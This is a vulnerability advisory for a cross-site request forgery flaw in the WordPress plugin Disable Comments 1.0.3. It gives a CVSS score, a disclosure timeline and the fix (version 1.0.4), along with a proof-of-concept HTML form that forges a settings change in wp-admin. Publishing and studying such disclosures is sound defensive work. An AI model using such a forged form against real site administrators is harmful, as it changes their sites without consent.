CSRF in Disable Comments 1.0.3


Last revised:

A CSRF vulnerability would allow an unauthorised attacker to cause a logged in admin to disable or enable comments if that admin visits a link of the attacker’s choosing (via spearphishing for instance).

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality None
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Clicking submit on this form will enable comments on all post types.

<form action="http://localhost/wp-admin/options-general.php?page=disable_comments_settings" method="POST">
  <input type="radio" name="mode" value="selected_types" checked>
  <input type='checkbox' name='disabled_types[]' value='post'>
  <input type='checkbox' name='disabled_types[]' value='page'>
  <input type='checkbox' name='disabled_types[]' value='attachment'>
  <input type="submit" name="submit">

Advisory timeline

  • 2014-03-04: Discovered
  • 2014-03-17: Reported to CVE requested.
  • 2014-03-31: No response, so re-reported directly to author. Publication clock restarted.
  • 2014-04-01: Author reports issue fixed.

Mitigation/further actions

Update to version 1.0.4 immediately.